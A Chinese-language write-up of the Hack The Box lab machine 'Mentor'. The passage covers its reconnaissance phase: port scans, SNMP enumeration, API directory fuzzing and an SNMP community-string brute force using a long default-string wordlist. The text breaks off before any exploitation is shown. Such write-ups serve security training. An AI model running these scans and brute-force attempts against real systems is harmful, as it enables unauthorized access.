Mentor-htb-writeup

0x00 靶场技能介绍

章节技能：SNMP扫描、子域名扫描、目录扫描、API接口分析、API某接口命令执行、SNMP-Brute、Dockerfile配置泄露、端口转发、ligolo-ng、psql、snmpd.conf泄露、sudo提权

参考链接：https://0xdf.gitlab.io/2023/03/11/htb-mentor.html

0x01 用户权限获取

1、获取下靶机IP地址：10.10.11.193

2、获取下开放端口情况：

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- --min-rate=10000 -oG allports 10.10.11.193    
[sudo] kali 的密码：
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-26 12:14 CST
Nmap scan report for 10.10.11.193
Host is up (7.6s latency).
Not shown: 62652 filtered tcp ports (no-response), 2881 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 52.23 seconds
                                                                          
┌──(kali㉿offsec)-[~/Desktop]
└─$ grep -oP '([0-9]+/open)' allports | awk -F/ '{print $1}' | tr '\n' ','
22,80,

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p22,80 -sC -sV --min-rate=2000 10.10.11.193    
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-26 12:16 CST
Nmap scan report for 10.10.11.193
Host is up (0.43s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 c7:3b:fc:3c:f9:ce:ee:8b:48:18:d5:d1:af:8e:c2:bb (ECDSA)
|_  256 44:40:08:4c:0e:cb:d4:f1:8e:7e:ed:a8:5c:68:a4:f7 (ED25519)
80/tcp open  http    Apache httpd 2.4.52
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Did not follow redirect to http://mentorquotes.htb/
Service Info: Host: mentorquotes.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.70 seconds

3、根据扫描出来的域名情况，进行域名绑定

┌──(kali㉿offsec)-[~/Desktop]
└─$ echo "10.10.11.193 mentorquotes.htb" | sudo tee -a /etc/hosts
[sudo] kali 的密码：
10.10.11.193 mentorquotes.htb

4、这里再补一个udp的扫描，因为VPN网络延迟，这里udp扫了好多遍的结果

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- --min-rate=10000  10.10.11.193 -sU
[sudo] kali 的密码：
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-26 15:21 CST
Warning: 10.10.11.193 giving up on port because retransmission cap hit (10).
Nmap scan report for mentorquotes.htb (10.10.11.193)
Host is up (0.94s latency).
Not shown: 65451 open|filtered udp ports (no-response), 83 closed udp ports (port-unreach)
PORT    STATE SERVICE
161/udp open  snmp

Nmap done: 1 IP address (1 host up) scanned in 85.30 seconds

5、先访问下域名地址：

http://mentorquotes.htb/

6、先枚举下161端口看看有什么信息服务泄露没

┌──(kali㉿offsec)-[~/Desktop]
└─$ snmp-check 10.10.11.193                         
snmp-check v1.9 - SNMP enumerator
Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org)

[+] Try to connect to 10.10.11.193:161 using SNMPv1 and community 'public'

[*] System information:

  Host IP address               : 10.10.11.193
  Hostname                      : mentor
  Description                   : Linux mentor 5.15.0-56-generic #62-Ubuntu SMP Tue Nov 22 19:54:14 UTC 2022 x86_64
  Contact                       : Me <admin@mentorquotes.htb>
  Location                      : Sitting on the Dock of the Bay
  Uptime snmp                   : 03:53:44.78
  Uptime system                 : 03:53:29.36
  System date                   : 2024-5-26 07:19:33.0

┌──(kali㉿offsec)-[~/Desktop]
└─$ snmpwalk -c public -v1 10.10.11.193             
iso.3.6.1.2.1.1.1.0 = STRING: "Linux mentor 5.15.0-56-generic #62-Ubuntu SMP Tue Nov 22 19:54:14 UTC 2022 x86_64"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
iso.3.6.1.2.1.1.3.0 = Timeticks: (1403885) 3:53:58.85
iso.3.6.1.2.1.1.4.0 = STRING: "Me <admin@mentorquotes.htb>"
iso.3.6.1.2.1.1.5.0 = STRING: "mentor"
iso.3.6.1.2.1.1.6.0 = STRING: "Sitting on the Dock of the Bay"
iso.3.6.1.2.1.1.7.0 = INTEGER: 72
iso.3.6.1.2.1.1.8.0 = Timeticks: (0) 0:00:00.00
iso.3.6.1.2.1.1.9.1.2.1 = OID: iso.3.6.1.6.3.10.3.1.1
iso.3.6.1.2.1.1.9.1.2.2 = OID: iso.3.6.1.6.3.11.3.1.1
iso.3.6.1.2.1.1.9.1.2.3 = OID: iso.3.6.1.6.3.15.2.1.1
iso.3.6.1.2.1.1.9.1.2.4 = OID: iso.3.6.1.6.3.1
iso.3.6.1.2.1.1.9.1.2.5 = OID: iso.3.6.1.6.3.16.2.2.1
iso.3.6.1.2.1.1.9.1.2.6 = OID: iso.3.6.1.2.1.49
iso.3.6.1.2.1.1.9.1.2.7 = OID: iso.3.6.1.2.1.50
iso.3.6.1.2.1.1.9.1.2.8 = OID: iso.3.6.1.2.1.4
iso.3.6.1.2.1.1.9.1.2.9 = OID: iso.3.6.1.6.3.13.3.1.3
iso.3.6.1.2.1.1.9.1.2.10 = OID: iso.3.6.1.2.1.92
iso.3.6.1.2.1.1.9.1.3.1 = STRING: "The SNMP Management Architecture MIB."
iso.3.6.1.2.1.1.9.1.3.2 = STRING: "The MIB for Message Processing and Dispatching."
iso.3.6.1.2.1.1.9.1.3.3 = STRING: "The management information definitions for the SNMP User-based Security Model."
iso.3.6.1.2.1.1.9.1.3.4 = STRING: "The MIB module for SNMPv2 entities"
iso.3.6.1.2.1.1.9.1.3.5 = STRING: "View-based Access Control Model for SNMP."
iso.3.6.1.2.1.1.9.1.3.6 = STRING: "The MIB module for managing TCP implementations"
iso.3.6.1.2.1.1.9.1.3.7 = STRING: "The MIB module for managing UDP implementations"
iso.3.6.1.2.1.1.9.1.3.8 = STRING: "The MIB module for managing IP and ICMP implementations"
iso.3.6.1.2.1.1.9.1.3.9 = STRING: "The MIB modules for managing SNMP Notification, plus filtering."
iso.3.6.1.2.1.1.9.1.3.10 = STRING: "The MIB module for logging SNMP Notifications."
iso.3.6.1.2.1.1.9.1.4.1 = Timeticks: (0) 0:00:00.00
iso.3.6.1.2.1.1.9.1.4.2 = Timeticks: (0) 0:00:00.00
iso.3.6.1.2.1.1.9.1.4.3 = Timeticks: (0) 0:00:00.00
iso.3.6.1.2.1.1.9.1.4.4 = Timeticks: (0) 0:00:00.00
iso.3.6.1.2.1.1.9.1.4.5 = Timeticks: (0) 0:00:00.00
iso.3.6.1.2.1.1.9.1.4.6 = Timeticks: (0) 0:00:00.00
iso.3.6.1.2.1.1.9.1.4.7 = Timeticks: (0) 0:00:00.00
iso.3.6.1.2.1.1.9.1.4.8 = Timeticks: (0) 0:00:00.00
iso.3.6.1.2.1.1.9.1.4.9 = Timeticks: (0) 0:00:00.00
iso.3.6.1.2.1.1.9.1.4.10 = Timeticks: (0) 0:00:00.00
iso.3.6.1.2.1.25.1.1.0 = Timeticks: (1406557) 3:54:25.57
iso.3.6.1.2.1.25.1.2.0 = Hex-STRING: 07 E8 05 1A 07 14 0E 00 2B 00 00 
iso.3.6.1.2.1.25.1.3.0 = INTEGER: 393216
iso.3.6.1.2.1.25.1.4.0 = STRING: "BOOT_IMAGE=/vmlinuz-5.15.0-56-generic root=/dev/mapper/ubuntu--vg-ubuntu--lv ro net.ifnames=0 biosdevname=0
"
iso.3.6.1.2.1.25.1.5.0 = Gauge32: 0
iso.3.6.1.2.1.25.1.6.0 = Gauge32: 229
iso.3.6.1.2.1.25.1.7.0 = INTEGER: 0
End of MIB

7、这个题的子域名枚举，就是个坑，还必须要深度枚举，先绑定下子域名地址。。。。

┌──(kali㉿offsec)-[~/Desktop]
└─$ echo "10.10.11.193 api.mentorquotes.htb" | sudo tee -a /etc/hosts
[sudo] kali 的密码：
10.10.11.193 api.mentorquotes.htb

8、枚举子域名的目录地址

┌──(kali㉿offsec)-[~/Desktop]
└─$ ffuf -u http://api.mentorquotes.htb/FUZZ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt 

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://api.mentorquotes.htb/FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

docs                    [Status: 200, Size: 969, Words: 194, Lines: 31, Duration: 163ms]
users                   [Status: 307, Size: 0, Words: 1, Lines: 1, Duration: 135ms]
admin                   [Status: 307, Size: 0, Words: 1, Lines: 1, Duration: 139ms]
quotes                  [Status: 307, Size: 0, Words: 1, Lines: 1, Duration: 134ms]
redoc                   [Status: 200, Size: 772, Words: 149, Lines: 28, Duration: 167ms]
server-status           [Status: 403, Size: 285, Words: 20, Lines: 10, Duration: 133ms]
:: Progress: [220560/220560] :: Job [1/1] :: 226 req/sec :: Duration: [0:19:45] :: Errors: 0 ::

9、访问相关发现的目录地址

http://api.mentorquotes.htb/

view-source:http://api.mentorquotes.htb/docs

http://api.mentorquotes.htb/openapi.json

{"openapi":"3.0.2","info":{"title":"MentorQuotes","description":"Working towards helping people move forward","contact":{"name":"james","url":"http://mentorquotes.htb","email":"james@mentorquotes.htb"},"version":"0.0.1"},"paths":{"/auth/login":{"post":{"tags":["Auth"],"summary":"Login","operationId":"login_auth_login_post","requestBody":{"content":{"application/json":{"schema":{"$ref":"#/components/schemas/userSchema"}}},"required":true},"responses":{"200":{"description":"Successful Response","content":{"application/json":{"schema":{}}}},"422":{"description":"Validation Error","content":{"application/json":{"schema":{"$ref":"#/components/schemas/HTTPValidationError"}}}}}}},"/auth/signup":{"post":{"tags":["Auth"],"summary":"Create User","operationId":"create_user_auth_signup_post","requestBody":{"content":{"application/json":{"schema":{"$ref":"#/components/schemas/userSchema"}}},"required":true},"responses":{"201":{"description":"Successful Response","content":{"application/json":{"schema":{"$ref":"#/components/schemas/userDB"}}}},"422":{"description":"Validation Error","content":{"application/json":{"schema":{"$ref":"#/components/schemas/HTTPValidationError"}}}}}}},"/users/":{"get":{"tags":["Users"],"summary":"Get Users","operationId":"get_users_users__get","parameters":[{"required":true,"schema":{"title":"Authorization","type":"string"},"name":"Authorization","in":"header"}],"responses":{"201":{"description":"Successful Response","content":{"application/json":{"schema":{"title":"Response Get Users Users  Get","type":"array","items":{"$ref":"#/components/schemas/userDB"}}}}},"422":{"description":"Validation Error","content":{"application/json":{"schema":{"$ref":"#/components/schemas/HTTPValidationError"}}}}}}},"/users/{id}/":{"get":{"tags":["Users"],"summary":"Get User By Id","operationId":"get_user_by_id_users__id___get","parameters":[{"required":true,"schema":{"title":"Id","exclusiveMinimum":0.0,"type":"integer"},"name":"id","in":"path"},{"required":true,"schema":{"title":"Authorization","type":"string"},"name":"Authorization","in":"header"}],"responses":{"201":{"description":"Successful Response","content":{"application/json":{"schema":{"$ref":"#/components/schemas/userDB"}}}},"422":{"description":"Validation Error","content":{"application/json":{"schema":{"$ref":"#/components/schemas/HTTPValidationError"}}}}}}},"/users/add":{"post":{"tags":["Users"],"summary":"Create User","operationId":"create_user_users_add_post","parameters":[{"required":true,"schema":{"title":"Authorization","type":"string"},"name":"Authorization","in":"header"}],"requestBody":{"content":{"application/json":{"schema":{"$ref":"#/components/schemas/userSchema"}}},"required":true},"responses":{"201":{"description":"Successful Response","content":{"application/json":{"schema":{"$ref":"#/components/schemas/userDB"}}}},"422":{"description":"Validation Error","content":{"application/json":{"schema":{"$ref":"#/components/schemas/HTTPValidationError"}}}}}}},"/quotes/":{"get":{"tags":["Quotes"],"summary":"Read All Quotes","operationId":"read_all_quotes_quotes__get","parameters":[{"required":true,"schema":{"title":"Authorization","type":"string"},"name":"Authorization","in":"header"}],"responses":{"200":{"description":"Successful Response","content":{"application/json":{"schema":{"title":"Response Read All Quotes Quotes  Get","type":"array","items":{"$ref":"#/components/schemas/quoteDB"}}}}},"422":{"description":"Validation Error","content":{"application/json":{"schema":{"$ref":"#/components/schemas/HTTPValidationError"}}}}}},"post":{"tags":["Quotes"],"summary":"Create Quote","operationId":"create_quote_quotes__post","parameters":[{"required":true,"schema":{"title":"Authorization","type":"string"},"name":"Authorization","in":"header"}],"requestBody":{"content":{"application/json":{"schema":{"$ref":"#/components/schemas/quoteSchema"}}},"required":true},"responses":{"201":{"description":"Successful Response","content":{"application/json":{"schema":{"$ref":"#/components/schemas/quoteDB"}}}},"422":{"description":"Validation Error","content":{"application/json":{"schema":{"$ref":"#/components/schemas/HTTPValidationError"}}}}}}},"/quotes/{id}/":{"get":{"tags":["Quotes"],"summary":"Read Quote","operationId":"read_quote_quotes__id___get","parameters":[{"required":true,"schema":{"title":"Id","exclusiveMinimum":0.0,"type":"integer"},"name":"id","in":"path"},{"required":true,"schema":{"title":"Authorization","type":"string"},"name":"Authorization","in":"header"}],"responses":{"200":{"description":"Successful Response","content":{"application/json":{"schema":{"$ref":"#/components/schemas/quoteDB"}}}},"422":{"description":"Validation Error","content":{"application/json":{"schema":{"$ref":"#/components/schemas/HTTPValidationError"}}}}}},"put":{"tags":["Quotes"],"summary":"Update Quote","operationId":"update_quote_quotes__id___put","parameters":[{"required":true,"schema":{"title":"Id","exclusiveMinimum":0.0,"type":"integer"},"name":"id","in":"path"},{"required":true,"schema":{"title":"Authorization","type":"string"},"name":"Authorization","in":"header"}],"requestBody":{"content":{"application/json":{"schema":{"$ref":"#/components/schemas/quoteSchema"}}},"required":true},"responses":{"200":{"description":"Successful Response","content":{"application/json":{"schema":{"$ref":"#/components/schemas/quoteDB"}}}},"422":{"description":"Validation Error","content":{"application/json":{"schema":{"$ref":"#/components/schemas/HTTPValidationError"}}}}}},"delete":{"tags":["Quotes"],"summary":"Delete Quote","operationId":"delete_quote_quotes__id___delete","parameters":[{"required":true,"schema":{"title":"Id","exclusiveMinimum":0.0,"type":"integer"},"name":"id","in":"path"},{"required":true,"schema":{"title":"Authorization","type":"string"},"name":"Authorization","in":"header"}],"responses":{"200":{"description":"Successful Response","content":{"application/json":{"schema":{"$ref":"#/components/schemas/quoteDB"}}}},"422":{"description":"Validation Error","content":{"application/json":{"schema":{"$ref":"#/components/schemas/HTTPValidationError"}}}}}}}},"components":{"schemas":{"HTTPValidationError":{"title":"HTTPValidationError","type":"object","properties":{"detail":{"title":"Detail","type":"array","items":{"$ref":"#/components/schemas/ValidationError"}}}},"ValidationError":{"title":"ValidationError","required":["loc","msg","type"],"type":"object","properties":{"loc":{"title":"Location","type":"array","items":{"type":"string"}},"msg":{"title":"Message","type":"string"},"type":{"title":"Error Type","type":"string"}}},"quoteDB":{"title":"quoteDB","required":["title","description","id"],"type":"object","properties":{"title":{"title":"Title","maxLength":50,"minLength":3,"type":"string"},"description":{"title":"Description","maxLength":1500,"minLength":3,"type":"string"},"id":{"title":"Id","type":"integer"}}},"quoteSchema":{"title":"quoteSchema","required":["title","description"],"type":"object","properties":{"title":{"title":"Title","maxLength":50,"minLength":3,"type":"string"},"description":{"title":"Description","maxLength":1500,"minLength":3,"type":"string"}}},"userDB":{"title":"userDB","required":["id","email","username"],"type":"object","properties":{"id":{"title":"Id","type":"integer"},"email":{"title":"Email","type":"string"},"username":{"title":"Username","type":"string"}}},"userSchema":{"title":"userSchema","required":["email","username","password"],"type":"object","properties":{"email":{"title":"Email","type":"string","format":"email"},"username":{"title":"Username","maxLength":50,"minLength":5,"type":"string"},"password":{"title":"Password","maxLength":50,"minLength":8,"type":"string"}}}}}}

10、这里发现了一个邮箱和很多API接口信息

james@mentorquotes.htb

11、到这里需要补一个枚举，就是SNMP的公共库名的暴力枚举

https://github.com/SECFORCE/SNMP-Brute

┌──(kali㉿offsec)-[~/Desktop/SNMP-Brute]
└─$ python3 snmpbrute.py -t 10.10.11.193
   _____ _   ____  _______     ____             __     
  / ___// | / /  |/  / __ \   / __ )_______  __/ /____ 
  \__ \/  |/ / /|_/ / /_/ /  / __  / ___/ / / / __/ _ \
 ___/ / /|  / /  / / ____/  / /_/ / /  / /_/ / /_/  __/
/____/_/ |_/_/  /_/_/      /_____/_/   \__,_/\__/\___/ 

SNMP Bruteforce & Enumeration Script v2.0
http://www.secforce.com / nikos.vassakis <at> secforce.com
###############################################################

Trying ['', '0', '0392a0', '1234', '2read', '3com', '3Com', '3COM', '4changes', 'access', 'adm', 'admin', 'Admin', 'administrator', 'agent', 'agent_steal', 'all', 'all private', 'all public', 'anycom', 'ANYCOM', 'apc', 'bintec', 'blue', 'boss', 'c', 'C0de', 'cable-d', 'cable_docsispublic@es0', 'cacti', 'canon_admin', 'cascade', 'cc', 'changeme', 'cisco', 'CISCO', 'cmaker', 'comcomcom', 'community', 'core', 'CR52401', 'crest', 'debug', 'default', 'demo', 'dilbert', 'enable', 'entry', 'field', 'field-service', 'freekevin', 'friend', 'fubar', 'guest', 'hello', 'hideit', 'host', 'hp_admin', 'ibm', 'IBM', 'ilmi', 'ILMI', 'intel', 'Intel', 'intermec', 'Intermec', 'internal', 'internet', 'ios', 'isdn', 'l2', 'l3', 'lan', 'liteon', 'login', 'logon', 'lucenttech', 'lucenttech1', 'lucenttech2', 'manager', 'master', 'microsoft', 'mngr', 'mngt', 'monitor', 'mrtg', 'nagios', 'net', 'netman', 'network', 'nobody', 'NoGaH$@!', 'none', 'notsopublic', 'nt', 'ntopia', 'openview', 'operator', 'OrigEquipMfr', 'ourCommStr', 'pass', 'passcode', 'password', 'PASSWORD', 'pr1v4t3', 'pr1vat3', 'private', ' private', 'private ', 'Private', 'PRIVATE', 'private@es0', 'Private@es0', 'private@es1', 'Private@es1', 'proxy', 'publ1c', 'public', ' public', 'public ', 'Public', 'PUBLIC', 'public@es0', 'public@es1', 'public/RO', 'read', 'read-only', 'readwrite', 'read-write', 'red', 'regional', '<removed>', 'rmon', 'rmon_admin', 'ro', 'root', 'router', 'rw', 'rwa', 'sanfran', 'san-fran', 'scotty', 'secret', 'Secret', 'SECRET', 'Secret C0de', 'security', 'Security', 'SECURITY', 'seri', 'server', 'snmp', 'SNMP', 'snmpd', 'snmptrap', 'snmp-Trap', 'SNMP_trap', 'SNMPv1/v2c', 'SNMPv2c', 'solaris', 'solarwinds', 'sun', 'SUN', 'superuser', 'supervisor', 'support', 'switch', 'Switch', 'SWITCH', 'sysadm', 'sysop', 'Sysop', 'system', 'System', 'SYSTEM', 'tech', 'telnet', 'TENmanUFactOryPOWER', 'test', 'TEST', 'test2', 'tiv0li', 'tivoli', 'topsecret', 'traffic', 'trap', 'user', 'vterm1', 'watch', 'watchit', 'windows', 'windowsnt', 'workstation', 'world', 'write', 'writeit', 'xyzzy', 'yellow', 'ILMI'] community strings ...
10.10.11.193 : 161      Version (v2c):  internal
10.10.11.193 : 161      Version (v1):   public
10.10.11.193 : 161      Version (v2c):  public
10.10.11.193 : 161      Version (v1):   public
10.10.11.193 : 161      Version (v2c):  public
Waiting for late packets (CTRL+C to stop)

Trying identified strings for READ-WRITE ...

Identified Community strings
        0) 10.10.11.193    internal (v2c)(RO)
        1) 10.10.11.193    public (v1)(RO)
        2) 10.10.11.193    public (v2c)(RO)
        3) 10.10.11.193    public (v1)(RO)
        4) 10.10.11.193    public (v2c)(RO)
Select Community to Enumerate [0]:internal

12、对新发现的库名进行枚举，这里没有使用snmpwalk这个工具，主要还是显示的信息太多了，下面使用 snmp-check 工具进行展示

snmpwalk -v2c -c internal 10.10.11.193

┌──(kali㉿offsec)-[~/Desktop]
└─$ snmp-check 10.10.11.193 -c internal -v 2c
snmp-check v1.9 - SNMP enumerator
Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org)

[+] Try to connect to 10.10.11.193:161 using SNMPv2c and community 'internal'

[*] System information:

  Host IP address               : 10.10.11.193
  Hostname                      : mentor
  Description                   : Linux mentor 5.15.0-56-generic #62-Ubuntu SMP Tue Nov 22 19:54:14 UTC 2022 x86_64
  Contact                       : Me <admin@mentorquotes.htb>
  Location                      : Sitting on the Dock of the Bay
  Uptime snmp                   : 04:36:26.55
  Uptime system                 : 04:36:11.15
  System date                   : 2024-5-26 08:02:15.0

[*] Network information:

  IP forwarding enabled         : yes
  Default TTL                   : 64
  TCP segments received         : 1425388
  TCP segments sent             : 1587784
  TCP segments retrans          : 40780
  Input datagrams               : 1697241
  Delivered datagrams           : 1693596
  Output datagrams              : 1618935

[*] Network interfaces:

  Interface                     : [ up ] lo
  Id                            : 1
  Mac Address                   : :::::
  Type                          : softwareLoopback
  Speed                         : 10 Mbps
  MTU                           : 65536
  In octets                     : 509406
  Out octets                    : 509406

  Interface                     : [ up ] eth0
  Id                            : 2
  Mac Address                   : 00:50:56:b9:49:5a
  Type                          : ethernet-csmacd
  Speed                         : 4294 Mbps
  MTU                           : 1500
  In octets                     : 129369570
  Out octets                    : 188377947

  Interface                     : [ up ] br-7d5c72654da7
  Id                            : 3
  Mac Address                   : 02:42:68:9b:bc:93
  Type                          : ethernet-csmacd
  Speed                         : 4294 Mbps
  MTU                           : 1500
  In octets                     : 71597736
  Out octets                    : 115745894

  Interface                     : [ up ] br-a8a89c3bf6ff
  Id                            : 4
  Mac Address                   : 02:42:c0:ec:32:69
  Type                          : ethernet-csmacd
  Speed                         : 0 Mbps
  MTU                           : 1500
  In octets                     : 0
  Out octets                    : 0

  Interface                     : [ up ] docker0
  Id                            : 5
  Mac Address                   : 02:42:39:3a:24:68
  Type                          : ethernet-csmacd
  Speed                         : 0 Mbps
  MTU                           : 1500
  In octets                     : 0
  Out octets                    : 0

  Interface                     : [ up ] br-028c7a43f929
  Id                            : 6
  Mac Address                   : 02:42:da:c1:4f:9f
  Type                          : ethernet-csmacd
  Speed                         : 0 Mbps
  MTU                           : 1500
  In octets                     : 0
  Out octets                    : 0

  Interface                     : [ up ] br-24ddaa1f3b47
  Id                            : 7
  Mac Address                   : 02:42:18:b0:dc:53
  Type                          : ethernet-csmacd
  Speed                         : 0 Mbps
  MTU                           : 1500
  In octets                     : 0
  Out octets                    : 0

  Interface                     : [ up ] br-3d63c18e314d
  Id                            : 8
  Mac Address                   : 02:42:76:72:3c:26
  Type                          : ethernet-csmacd
  Speed                         : 0 Mbps
  MTU                           : 1500
  In octets                     : 0
  Out octets                    : 0

  Interface                     : [ up ] vethd75eef7
  Id                            : 10
  Mac Address                   : 3e:ae:2e:90:22:d3
  Type                          : ethernet-csmacd
  Speed                         : 4294 Mbps
  MTU                           : 1500
  In octets                     : 412444
  Out octets                    : 447123

  Interface                     : [ up ] veth7c0935f
  Id                            : 12
  Mac Address                   : 96:df:ba:db:a8:9d
  Type                          : ethernet-csmacd
  Speed                         : 4294 Mbps
  MTU                           : 1500
  In octets                     : 64492083
  Out octets                    : 100469815

  Interface                     : [ up ] vethbd6a9fa
  Id                            : 14
  Mac Address                   : 4e:8c:88:15:59:c0
  Type                          : ethernet-csmacd
  Speed                         : 4294 Mbps
  MTU                           : 1500
  In octets                     : 14634943
  Out octets                    : 14834632


[*] Network IP:

  Id                    IP Address            Netmask               Broadcast           
  2                     10.10.11.193          255.255.254.0         1                   
  1                     127.0.0.1             255.0.0.0             0                   
  5                     172.17.0.1            255.255.0.0           1                   
  4                     172.18.0.1            255.255.0.0           1                   
  7                     172.19.0.1            255.255.0.0           1                   
  6                     172.20.0.1            255.255.0.0           1                   
  8                     172.21.0.1            255.255.0.0           1                   
  3                     172.22.0.1            255.255.0.0           1                   

[*] Routing information:

  Destination           Next hop              Mask                  Metric              
  0.0.0.0               10.10.10.2            0.0.0.0               1                   
  10.10.10.0            0.0.0.0               255.255.254.0         0                   
  172.17.0.0            0.0.0.0               255.255.0.0           0                   
  172.18.0.0            0.0.0.0               255.255.0.0           0                   
  172.19.0.0            0.0.0.0               255.255.0.0           0                   
  172.20.0.0            0.0.0.0               255.255.0.0           0                   
  172.21.0.0            0.0.0.0               255.255.0.0           0                   
  172.22.0.0            0.0.0.0               255.255.0.0           0                   

[*] TCP connections and listening ports:

  Local address         Local port            Remote address        Remote port           State               
  0.0.0.0               22                    0.0.0.0               0                     listen              
  10.10.11.193          47616                 8.8.8.8               53                    synSent             
  127.0.0.1             35345                 0.0.0.0               0                     listen              
  127.0.0.53            53                    0.0.0.0               0                     listen              
  172.22.0.1            81                    0.0.0.0               0                     listen              
  172.22.0.1            5432                  0.0.0.0               0                     listen              
  172.22.0.1            5432                  172.22.0.3            38048                 established         
  172.22.0.1            5432                  172.22.0.3            38814                 established         
  172.22.0.1            8000                  0.0.0.0               0                     listen              
  172.22.0.1            33730                 172.22.0.4            5432                  established                 
  172.22.0.1            59298                 172.22.0.1            8000                  closeWait           

[*] Listening UDP ports:

  Local address         Local port          
  0.0.0.0               68                  
  0.0.0.0               161                 
  127.0.0.53            53                  

[*] Processes:

  Id                    Status                Name                  Path                  Parameters          
  1                     runnable              systemd               /sbin/init                                
  2                     runnable              kthreadd                                                        
..................                                                 
  396                   unknown               raid5wq                                                         
  454                   runnable              jbd2/dm-0-8                                                     
  455                   unknown               ext4-rsv-conver                                                 
  516                   runnable              systemd-journal       /lib/systemd/systemd-journald                      
  547                   unknown               kaluad                                                          
  552                   unknown               kmpath_rdacd                                                    
  553                   unknown               kmpathd                                                         
  554                   unknown               kmpath_handlerd                                                 
  555                   runnable              multipathd            /sbin/multipathd      -d -s               
  568                   runnable              systemd-udevd         /lib/systemd/systemd-udevd                      
  595                   runnable              systemd-network       /lib/systemd/systemd-networkd                      
  748                   runnable              jbd2/sda2-8                                                     
  749                   unknown               ext4-rsv-conver                                                 
  762                   runnable              systemd-resolve       /lib/systemd/systemd-resolved                      
  763                   runnable              systemd-timesyn       /lib/systemd/systemd-timesyncd                      
  778                   runnable              VGAuthService         /usr/bin/VGAuthService                      
  779                   runnable              vmtoolsd              /usr/bin/vmtoolsd                         
  807                   runnable              dhclient              /sbin/dhclient        -1 -4 -v -i -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases -I -df /var/lib/dhcp/dhclient6.eth0.leases eth0
  858                   runnable              dbus-daemon           @dbus-daemon          --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  867                   runnable              irqbalance            /usr/sbin/irqbalance  --foreground        
  868                   runnable              networkd-dispat       /usr/bin/python3      /usr/bin/networkd-dispatcher --run-startup-triggers
  869                   runnable              polkitd               /usr/libexec/polkitd  --no-debug          
  870                   runnable              rsyslogd              /usr/sbin/rsyslogd    -n -iNONE           
  871                   runnable              snapd                 /usr/lib/snapd/snapd                      
  872                   runnable              systemd-logind        /lib/systemd/systemd-logind                      
  876                   runnable              udisksd               /usr/libexec/udisks2/udisksd                      
  925                   runnable              ModemManager          /usr/sbin/ModemManager                      
  1218                  runnable              cron                  /usr/sbin/cron        -f -P               
  1220                  running               snmpd                 /usr/sbin/snmpd       -LOw -u Debian-snmp -g Debian-snmp -I -smux mteTrigger mteTriggerConf -f
  1236                  runnable              containerd            /usr/bin/containerd                       
  1242                  runnable              agetty                /sbin/agetty          -o -p -- \u --noclear tty1 linux
  1265                  runnable              sshd                  sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups                      
  1280                  runnable              apache2               /usr/sbin/apache2     -k start            
  1281                  runnable              apache2               /usr/sbin/apache2     -k start            
  1282                  runnable              apache2               /usr/sbin/apache2     -k start            
  1347                  runnable              dockerd               /usr/bin/dockerd      -H fd:// --containerd=/run/containerd/containerd.sock
  1685                  runnable              login.sh              /bin/bash             /usr/local/bin/login.sh
  1750                  runnable              docker-proxy          /usr/bin/docker-proxy  -proto tcp -host-ip 172.22.0.1 -host-port 5432 -container-ip 172.22.0.4 -container-port 5432
  1766                  runnable              containerd-shim       /usr/bin/containerd-shim-runc-v2  -namespace moby -id 96e44c5692920491cdb954f3d352b3532a88425979cd48b3959b63bfec98a6f4 -address /run/containerd/containerd.sock
  1789                  runnable              postgres              postgres                                  
  1863                  runnable              docker-proxy          /usr/bin/docker-proxy  -proto tcp -host-ip 172.22.0.1 -host-port 8000 -container-ip 172.22.0.3 -container-port 8000
  1885                  runnable              containerd-shim       /usr/bin/containerd-shim-runc-v2  -namespace moby -id 58de9fcf2b6a90b23e0245c0c3e17026442885b54e1be43c36f439950212e0a7 -address /run/containerd/containerd.sock
  1908                  runnable              python3               python3               -m uvicorn app.main:app --reload --workers 2 --host 0.0.0.0 --port 8000
  1921                  runnable              postgres              postgres: checkpointer                      
  1922                  runnable              postgres              postgres: background writer                      
  1923                  runnable              postgres              postgres: walwriter                       
  1924                  runnable              postgres              postgres: autovacuum launcher                      
  1925                  runnable              postgres              postgres: stats collector                      
  1926                  runnable              postgres              postgres: logical replication launcher                      
  1986                  runnable              docker-proxy          /usr/bin/docker-proxy  -proto tcp -host-ip 172.22.0.1 -host-port 81 -container-ip 172.22.0.2 -container-port 80
  2002                  runnable              containerd-shim       /usr/bin/containerd-shim-runc-v2  -namespace moby -id 4fea1fbfee050c8d74ef96b0a317c563734566ac9d5f3125592b0f58e2391a82 -address /run/containerd/containerd.sock
  2024                  runnable              python                python                main.py             
  2066                  runnable              python3               /usr/local/bin/python3  -c from multiprocessing.semaphore_tracker import main;main(4)
